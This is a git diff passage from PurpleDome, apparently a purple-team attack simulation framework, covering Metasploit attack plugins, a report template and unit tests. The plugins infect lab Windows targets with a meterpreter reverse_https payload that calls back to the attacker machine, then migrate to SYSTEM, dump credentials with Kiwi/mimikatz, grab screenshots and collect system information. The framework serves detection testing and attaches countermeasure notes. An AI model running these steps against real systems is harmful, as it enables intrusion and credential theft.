"" + payload_type = "windows/x64/meterpreter/reverse_https" + payload_name = "babymetal.exe" + target = self.targets[0] + + ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) + + self.metasploit.smart_infect(target, + payload=payload_type, + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name) + + self.metasploit.kiwi(target, + variant=self.conf['variant'], + situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.", + countermeasure="Memory access into critical processes should be monitored." + ) + + return res diff --git a/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py b/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py index 46c410d..d908c87 100644 --- a/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py +++ b/plugins/default/metasploit_attacks/metasploit_migrate_t1055/metasploit_migrate.py @@ -2,8 +2,8 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement +import socket class MetasploitMigratePlugin(AttackPlugin): @@ -16,6 +16,8 @@ class MetasploitMigratePlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -27,17 +29,21 @@ class MetasploitMigratePlugin(AttackPlugin): """ res = "" - payload_type = "windows/meterpreter_reverse_https" + payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) + ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name + ) - metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") + self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM", name="svchost.exe", arch="x64") return res diff --git a/plugins/default/metasploit_attacks/metasploit_mimikatz_t1003/metasploit_mimikatz_t1003.py b/plugins/default/metasploit_attacks/metasploit_mimikatz_t1003/metasploit_mimikatz_t1003.py new file mode 100644 index 0000000..6bb58bd --- /dev/null +++ b/plugins/default/metasploit_attacks/metasploit_mimikatz_t1003/metasploit_mimikatz_t1003.py @@ -0,0 +1 @@ +# TODO: Implement diff --git a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py index e4109c1..f1bbf69 100644 --- a/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py +++ b/plugins/default/metasploit_attacks/metasploit_ps_t1057/metasploit_ps.py @@ -2,8 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement class MetasploitPsPlugin(AttackPlugin): @@ -16,6 +15,8 @@ class MetasploitPsPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -31,13 +32,12 @@ class MetasploitPsPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.ps_process_discovery(target) + self.metasploit.ps_process_discovery(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py index c427aeb..f74b6ae 100644 --- a/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py +++ b/plugins/default/metasploit_attacks/metasploit_screengrab_t1113/metasploit_screengrab.py @@ -2,8 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement class MetasploitScreengrabPlugin(AttackPlugin): @@ -16,6 +15,8 @@ class MetasploitScreengrabPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -27,19 +28,18 @@ class MetasploitScreengrabPlugin(AttackPlugin): """ res = "" - payload_type = "windows/meterpreter_reverse_https" + payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") + self.metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM") - metasploit.screengrab(target) + self.metasploit.screengrab(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py index 71647fa..12b193d 100644 --- a/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py +++ b/plugins/default/metasploit_attacks/metasploit_sysinfo_t1082/metasploit_sysinfo.py @@ -2,8 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement class MetasploitSysinfoPlugin(AttackPlugin): @@ -16,6 +15,8 @@ class MetasploitSysinfoPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -27,18 +28,17 @@ class MetasploitSysinfoPlugin(AttackPlugin): """ res = "" - payload_type = "windows/meterpreter_reverse_https" + payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - si = metasploit.sysinfo(target) + si = self.metasploit.sysinfo(target) print(f"Sysinfo: {si}") return res diff --git a/plugins/default/vm_controller/vagrant/vagrant_plugin.py b/plugins/default/vm_controller/vagrant/vagrant_plugin.py index 5bf5689..5180390 100644 --- a/plugins/default/vm_controller/vagrant/vagrant_plugin.py +++ b/plugins/default/vm_controller/vagrant/vagrant_plugin.py @@ -31,7 +31,7 @@ class VagrantPlugin(SSHFeatures, MachineryPlugin): self.connection = None self.vagrantfilepath = None self.vagrantfile = None - self.sysconf = {} + # self.sysconf = {} def process_config(self, config): """ Machine specific processing of configuration """ diff --git a/requirements.txt b/requirements.txt index 648e431..074e221 100644 --- a/requirements.txt +++ b/requirements.txt @@ -18,4 +18,5 @@ pylint mypy types-PyYAML types-requests -types-simplejson \ No newline at end of file +types-simplejson +types-paramiko diff --git a/systems/Vagrantfile b/systems/Vagrantfile index 4e9d0e4..5301ee2 100644 --- a/systems/Vagrantfile +++ b/systems/Vagrantfile @@ -143,6 +143,11 @@ Vagrant.configure("2") do |config| target3.vm.synced_folder ".", "/vagrant" + target3.vm.provider "virtualbox" do |v| + v.memory = 2048 + v.cpus = 4 + end + # Disable automatic box update checking. If you disable this, then # boxes will only be checked for updates when the user runs diff --git a/templates/attack_description.rst b/templates/attack_description.rst index 65db52a..dfd8c80 100644 --- a/templates/attack_description.rst +++ b/templates/attack_description.rst @@ -1,120 +1,207 @@ Attack ====== -Target systems --------------- +Boilerplate +----------- + +PurpleDome, attack-log version: {{ boilerplate.log_format_major_version }}.{{ boilerplate.log_format_minor_version }} + +Systems +------- + +{% for s in systems %} +{{ s.role }}:{{ s.name }} +~~~~~~~~~~~~ + +IP: {{ s.ip }} + +OS: {{ s.os }} + +Paw: {{ s.paw }} + +Group: {{ s.group }} + +Sensors: + +{% for sensor in s.sensors %} +* {{ sensor }} +{% endfor %} {# sensors #} + +Vulnerabilities: + +{% for vulnerability in s.vulnerabilities %} +* {{ vulnerability }} +{% endfor %} {# vulnerabilities #} + +{% endfor %} {# systems #} Attack steps ------------ + {% for e in events %} - {% if e.event is eq("start") %} - {% if e.type is eq("dropping_file") %} - Dropping file to target - ~~~~~~~~~~~~~~~~~~~~~~~ - At {{ e.timestamp }} - The file {{ e.file_name }} is dropped to the target {{ e.target }}. - {% endif %} - {% if e.type is eq("execute_payload") %} - Executing payload on target - ~~~~~~~~~~~~~~~~~~~~~~~~~~~ - At {{ e.timestamp }} - The command {{ e.command }} is used to start a file on the target {{ e.target }}. - {% endif %} - {% if e.type is eq("narration") %} - {{ e.text }} - {% endif %} - {% if e.sub_type is eq("metasploit") %} - Metasploit attack {{ e.name }} - ~~~~~~~~~~~~~~~~~~~~~~~~~~ - Tactics: {{ e.tactics }} - Tactics ID: {{ e.tactics_id }} - Hunting Tag: {{ e.hunting_tag}} - At {{ e.timestamp }} a Metasploit command {{ e.name }} was used to attack {{ e.target }} from {{ e.source }}. - {{ e.description }} - {% if e.metasploit_command is string() %} - Metasploit command: {{ e.metasploit_command }} - {% endif %} - {% if e.situation_description is string() %} - Situation: {{ e.situation_description }} - {% endif %} - {% if e.countermeasure is string() %} - Countermeasure: {{ e.countermeasure }} - {% endif %} - {% endif %} - {% if e.sub_type is eq("kali") %} - Kali attack {{ e.name }} - ~~~~~~~~~~~~~~~~~~~~~~~~~~ - Tactics: {{ e.tactics }} - Tactics ID: {{ e.tactics_id }} - Hunting Tag: {{ e.hunting_tag}} - At {{ e.timestamp }} a Kali command {{ e.kali_name }} was used to attack {{ e.target }} from {{ e.source }}. - {{ e.description }} - {% if e.kali_command is string() %} - Kali command: {{ e.kali_command }} - {% endif %} - {% if e.situation_description is string() %} - Situation: {{ e.situation_description }} - {% endif %} - {% if e.countermeasure is string() %} - Countermeasure: {{ e.countermeasure }} - {% endif %} - {% endif %} - {% if e.sub_type is eq("caldera") %} - Caldera attack {{ e.name }} - ~~~~~~~~~~~~~~~~~~~~~~~~~~ - Tactics: {{ e.tactics }} - Tactics ID: {{ e.tactics_id }} - Hunting Tag: {{ e.hunting_tag}} - At {{ e.timestamp }} a Caldera ability {{ e.ability_id }}/"{{ e.name }}" was used to attack the group {{ e.target_group }} from {{ e.source }}. - {{ e.description }} - {% if e.situation_description is string() %} - Situation: {{ e.situation_description }} - {% endif %} - {% if e.countermeasure is string() %} - Countermeasure: {{ e.countermeasure }} - {% endif %} - {% endif %} - {% endif %} {# event equal start #} +{% if e.event is eq("start") %} +{% if e.type is eq("attack_step") %} + + +{{ e.text }} +~~~~~~~~~~~~ +{% endif %} {# end attack_step #} +{% if e.type is eq("dropping_file") %} + +Dropping file to target +~~~~~~~~~~~~~~~~~~~~~~~ + +At {{ e.timestamp }} +The file {{ e.file_name }} is dropped to the target {{ e.target }}. +{% endif %} +{% if e.type is eq("execute_payload") %} + +Executing payload on target +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +At {{ e.timestamp }} +The command {{ e.command }} is used to start a file on the target {{ e.target }}. +{% endif %} +{% if e.type is eq("narration") %} +{{ e.text }} +{% endif %} +{% if e.sub_type is eq("metasploit") %} + +Metasploit attack {{ e.name }} +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + ++ Tactics: {{ e.tactics }} ++ Tactics ID: {{ e.tactics_id }} ++ Hunting Tag: {{ e.hunting_tag}} ++ At {{ e.timestamp }} a Metasploit command {{ e.name }} was used to attack {{ e.target }} from {{ e.source }}. ++ Description: {{ e.description }} +{% if e.metasploit_command is string() %} ++ Metasploit command: {{ e.metasploit_command }} +{% endif %} +{% if e.situation_description is string() %} ++ Situation: {{ e.situation_description }} +{% endif %} +{% if e.countermeasure is string() %} ++ Countermeasure: {{ e.countermeasure }} +{% endif %} +{% if e.result is string() %} +Attack result:: + + {{ e.result }} +{% endif %} +{% if e.result is iterable() %} +Attack result:: + +{% for item in e.result %} + {{ item|trim()|indent(4) }} +{% endfor %} +{% endif %} +{% endif %} +{% if e.sub_type is eq("kali") %} + +Kali attack {{ e.name }} +~~~~~~~~~~~~~~~~~~~~~~~~ + ++ Tactics: {{ e.tactics }} ++ Tactics ID: {{ e.tactics_id }} ++ Hunting Tag: {{ e.hunting_tag}} ++ At {{ e.timestamp }} a Kali command {{ e.kali_name }} was used to attack {{ e.target }} from {{ e.source }}. ++ Description: {{ e.description }} +{% if e.kali_command is string() %} ++ Kali command: {{ e.kali_command }} +{% endif %} +{% if e.situation_description is string() %} ++ Situation: {{ e.situation_description }} +{% endif %} +{% if e.countermeasure is string() %} ++ Countermeasure: {{ e.countermeasure }} +{% endif %} +{% if e.result is string() %} +Attack result:: + + {{ e.result }} +{% endif %} +{% if e.result is iterable() %} +Attack result:: + +{% for item in e.result %} + {{ item|trim()|indent(4) }} +{% endfor %} +{% endif %} +{% endif %} +{% if e.sub_type is eq("caldera") %} + +Caldera attack {{ e.name }} +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + ++ Tactics: {{ e.tactics }} ++ Tactics ID: {{ e.tactics_id }} ++ Hunting Tag: {{ e.hunting_tag}} ++ At {{ e.timestamp }} a Caldera ability {{ e.ability_id }}/"{{ e.name }}" was used to attack the group {{ e.target_group }} from {{ e.source }}. ++ Description: {{ e.description }} +{% if e.situation_description is string() %} ++ Situation: {{ e.situation_description }} +{% endif %} +{% if e.countermeasure is string() %} ++ Countermeasure: {{ e.countermeasure }} +{% endif %} +{% if e.result is string() %} +Attack result:: + + {{ e.result }} +{% endif %} +{% if e.result is iterable() %} +Attack result:: + +{% for item in e.result %} + {{ item|trim()|indent(4) }} +{% endfor %} +{% endif %} +{% endif %} +{% endif %} {# event equal start #} {% endfor %} Tools ----- + {% for e in events %} - {% if e.event is eq("start") %} - {% if e.type is eq("build") %} - Building tool {{ e.filename }} - ~~~~~~~~~~~~~~~~~~~~~~~ - The file {{ e.filename }} is built - {% if e.for_step %} - It will be used in Step {{ e.for_step }} - {% endif %} - Build time is between {{ e.timestamp }} and {{ e.timestamp_end }} - {% if e.dl_uri is string() %} - Built from source downloaded from {{ e.dl_uri }} - {% endif %} - {% if e.dl_uris %} - Built from sources downloaded from - {% for i in e.dl_uris %} - * {{ i }} - {% endfor %} - {% endif %} - {% if e.payload is string() %} - The attack tool uses a Meterpreter payload. The payload is {{ e.payload }}. The payload is built for the {{ e.platform }} platform and the {{ e.architecture }} architecture. - The settings for lhost and lport are {{ e.lhost }}/{{ e.lport }}. - {% endif %} - {% if e.encoding is string() %} - The file was encoded using {{ e.encoding }} after compilation. - {% endif %} - {% if e.encoded_filename is string() %} - The encoded version is named {{ e.encoded_filename }}. - {% endif %} - {% if e.SRDI_conversion %} - The attack tool was converted to position independent shellcode. See: https://github.com/monoxgas/sRDI - {% endif %} - {{ e.comment }} - {% endif %} - {% endif %} +{% if e.event is eq("start") %} +{% if e.type is eq("build") %} + +Building tool {{ e.filename }} +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +The file {{ e.filename }} is built +{% if e.for_step %} +It will be used in Step {{ e.for_step }} +{% endif %} +Build time is between {{ e.timestamp }} and {{ e.timestamp_end }} +{% if e.dl_uri is string() %} +Built from source downloaded from {{ e.dl_uri }} +{% endif %} +{% if e.dl_uris %} +Built from sources downloaded from +{% for i in e.dl_uris %} +* {{ i }} +{% endfor %} +{% endif %} +{% if e.payload is string() %} +The attack tool uses a Meterpreter payload. The payload is {{ e.payload }}. The payload is built for the {{ e.platform }} platform and the {{ e.architecture }} architecture. +The settings for lhost and lport are {{ e.lhost }}/{{ e.lport }}. +{% endif %} +{% if e.encoding is string() %} +The file was encoded using {{ e.encoding }} after compilation. +{% endif %} +{% if e.encoded_filename is string() %} +The encoded version is named {{ e.encoded_filename }}. +{% endif %} +{% if e.SRDI_conversion %} +The attack tool was converted to position independent shellcode. See: https://github.com/monoxgas/sRDI +{% endif %} +{{ e.comment }} +{% endif %} +{% endif %} {% endfor %} diff --git a/tests/test_attack_log.py b/tests/test_attack_log.py index b124834..b10e00b 100644 --- a/tests/test_attack_log.py +++ b/tests/test_attack_log.py @@ -18,7 +18,11 @@ class TestMachineConfig(unittest.TestCase): """ The init is empty """ al = AttackLog() self.assertIsNotNone(al) - self.assertEqual(al.get_dict(), []) + + default = {"boilerplate": {'log_format_major_version': 1, 'log_format_minor_version': 1}, + "system_overview": [], + "attack_log": []} + self.assertEqual(al.get_dict(), default) def test_caldera_attack_start(self): """ Starting a caldera attack """ @@ -39,16 +43,16 @@ class TestMachineConfig(unittest.TestCase): description=description ) data = al.get_dict() - self.assertEqual(data[0]["event"], "start") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "caldera") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target_paw"], paw) - self.assertEqual(data[0]["target_group"], group) - self.assertEqual(data[0]["ability_id"], ability_id) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) - self.assertEqual(data[0]["name"], name) - self.assertEqual(data[0]["description"], description) + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "caldera") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target_paw"], paw) + self.assertEqual(data["attack_log"][0]["target_group"], group) + self.assertEqual(data["attack_log"][0]["ability_id"], ability_id) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["name"], name) + self.assertEqual(data["attack_log"][0]["description"], description) def test_caldera_attack_stop(self): """ Stopping a caldera attack """ @@ -69,16 +73,16 @@ class TestMachineConfig(unittest.TestCase): description=description ) data = al.get_dict() - self.assertEqual(data[0]["event"], "stop") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "caldera") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target_paw"], paw) - self.assertEqual(data[0]["target_group"], group) - self.assertEqual(data[0]["ability_id"], ability_id) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) - self.assertEqual(data[0]["name"], name) - self.assertEqual(data[0]["description"], description) + self.assertEqual(data["attack_log"][0]["event"], "stop") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "caldera") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target_paw"], paw) + self.assertEqual(data["attack_log"][0]["target_group"], group) + self.assertEqual(data["attack_log"][0]["ability_id"], ability_id) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["name"], name) + self.assertEqual(data["attack_log"][0]["description"], description) def test_kali_attack_start(self): """ Starting a kali attack """ @@ -93,13 +97,13 @@ class TestMachineConfig(unittest.TestCase): ttp=ttp, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "start") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "kali") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["kali_name"], attack_name) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "kali") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["kali_name"], attack_name) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) def test_kali_attack_stop(self): """ Stopping a kali attack """ @@ -114,13 +118,107 @@ class TestMachineConfig(unittest.TestCase): ttp=ttp, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "stop") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "kali") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["kali_name"], attack_name) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["event"], "stop") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "kali") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["kali_name"], attack_name) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) + + def test_narration_start(self): + """ Starting a narration """ + al = AttackLog() + text = "texttextext" + + al.start_narration(text + ) + data = al.get_dict() + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "narration") + self.assertEqual(data["attack_log"][0]["sub_type"], "user defined narration") + self.assertEqual(data["attack_log"][0]["text"], text) + + def test_build_start(self): + """ Starting a build """ + al = AttackLog() + dl_uri = "asource" + dl_uris = "a target" + payload = "1234" + platform = "a name" + architecture = "arch" + lhost = "lhost" + lport = 8080 + filename = "afilename" + encoding = "encoded" + encoded_filename = "ef" + sRDI_conversion = True + for_step = 4 + comment = "this is a comment" + + al.start_build(dl_uri=dl_uri, + dl_uris=dl_uris, + payload=payload, + platform=platform, + architecture=architecture, + lhost=lhost, + lport=lport, + filename=filename, + encoding=encoding, + encoded_filename=encoded_filename, + sRDI_conversion=sRDI_conversion, + for_step=for_step, + comment=comment + ) + data = al.get_dict() + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "build") + self.assertEqual(data["attack_log"][0]["dl_uri"], dl_uri) + self.assertEqual(data["attack_log"][0]["dl_uris"], dl_uris) + self.assertEqual(data["attack_log"][0]["payload"], payload) + self.assertEqual(data["attack_log"][0]["platform"], platform) + self.assertEqual(data["attack_log"][0]["architecture"], architecture) + self.assertEqual(data["attack_log"][0]["lhost"], lhost) + self.assertEqual(data["attack_log"][0]["lport"], lport) + self.assertEqual(data["attack_log"][0]["filename"], filename) + self.assertEqual(data["attack_log"][0]["encoding"], encoding) + self.assertEqual(data["attack_log"][0]["encoded_filename"], encoded_filename) + self.assertEqual(data["attack_log"][0]["sRDI_conversion"], sRDI_conversion) + self.assertEqual(data["attack_log"][0]["for_step"], for_step) + self.assertEqual(data["attack_log"][0]["comment"], comment) + + def test_build_start_default(self): + """ Starting a build default values""" + al = AttackLog() + + al.start_build() + data = al.get_dict() + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "build") + self.assertEqual(data["attack_log"][0]["dl_uri"], None) + self.assertEqual(data["attack_log"][0]["dl_uris"], None) + self.assertEqual(data["attack_log"][0]["payload"], None) + self.assertEqual(data["attack_log"][0]["platform"], None) + self.assertEqual(data["attack_log"][0]["architecture"], None) + self.assertEqual(data["attack_log"][0]["lhost"], None) + self.assertEqual(data["attack_log"][0]["lport"], None) + self.assertEqual(data["attack_log"][0]["filename"], None) + self.assertEqual(data["attack_log"][0]["encoding"], None) + self.assertEqual(data["attack_log"][0]["encoded_filename"], None) + self.assertEqual(data["attack_log"][0]["sRDI_conversion"], False) + self.assertEqual(data["attack_log"][0]["for_step"], None) + self.assertEqual(data["attack_log"][0]["comment"], None) + + def test_build_stop(self): + """ Stopping a build """ + al = AttackLog() + logid = "lid" + + al.stop_build(logid=logid) + data = al.get_dict() + self.assertEqual(data["attack_log"][0]["event"], "stop") + self.assertEqual(data["attack_log"][0]["type"], "build") + self.assertEqual(data["attack_log"][0]["logid"], logid) def test_metasploit_attack_start(self): """ Starting a metasploit attack """ @@ -135,13 +233,13 @@ class TestMachineConfig(unittest.TestCase): ttp=ttp, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "start") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "metasploit") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["metasploit_command"], attack_name) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "metasploit") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["metasploit_command"], attack_name) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) def test_metasploit_attack_stop(self): """ Stopping a metasploit attack """ @@ -156,13 +254,13 @@ class TestMachineConfig(unittest.TestCase): ttp=ttp, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "stop") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "metasploit") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["metasploit_command"], attack_name) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["event"], "stop") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "metasploit") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["metasploit_command"], attack_name) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) def test_attack_plugin_start(self): """ Starting a attack plugin """ @@ -177,13 +275,13 @@ class TestMachineConfig(unittest.TestCase): ttp=ttp, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "start") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "attack_plugin") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["plugin_name"], attack_name) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "attack_plugin") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["plugin_name"], attack_name) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) def test_attack_plugin_stop(self): """ Stopping a attack plugin""" @@ -198,13 +296,13 @@ class TestMachineConfig(unittest.TestCase): ttp=ttp, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "stop") - self.assertEqual(data[0]["type"], "attack") - self.assertEqual(data[0]["sub_type"], "attack_plugin") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["plugin_name"], attack_name) - self.assertEqual(data[0]["hunting_tag"], "MITRE_" + ttp) + self.assertEqual(data["attack_log"][0]["event"], "stop") + self.assertEqual(data["attack_log"][0]["type"], "attack") + self.assertEqual(data["attack_log"][0]["sub_type"], "attack_plugin") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["plugin_name"], attack_name) + self.assertEqual(data["attack_log"][0]["hunting_tag"], "MITRE_" + ttp) def test_file_write_start(self): """ Starting a file write """ @@ -217,12 +315,12 @@ class TestMachineConfig(unittest.TestCase): file_name=file_name, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "start") - self.assertEqual(data[0]["type"], "dropping_file") - self.assertEqual(data[0]["sub_type"], "by PurpleDome") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["file_name"], file_name) + self.assertEqual(data["attack_log"][0]["event"], "start") + self.assertEqual(data["attack_log"][0]["type"], "dropping_file") + self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["file_name"], file_name) def test_file_write_stop(self): """ Stopping a file write """ @@ -235,12 +333,12 @@ class TestMachineConfig(unittest.TestCase): file_name=file_name, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "stop") - self.assertEqual(data[0]["type"], "dropping_file") - self.assertEqual(data[0]["sub_type"], "by PurpleDome") - self.assertEqual(data[0]["source"], source) - self.assertEqual(data[0]["target"], target) - self.assertEqual(data[0]["file_name"], file_name) + self.assertEqual(data["attack_log"][0]["event"], "stop") + self.assertEqual(data["attack_log"][0]["type"], "dropping_file") + self.assertEqual(data["attack_log"][0]["sub_type"], "by PurpleDome") + self.assertEqual(data["attack_log"][0]["source"], source) + self.assertEqual(data["attack_log"][0]["target"], target) + self.assertEqual(data["attack_log"][0]["file_name"], file_name) def test_execute_payload_start(self): """ Starting a execute payload """ @@ -253,12 +351,12 @@ class TestMachineConfig(unittest.TestCase): command=command, ) data = al.get_dict() - self.assertEqual(data[0]["event"], "start") - self.assertEqual(data[0]["type"], "execute_payload") - 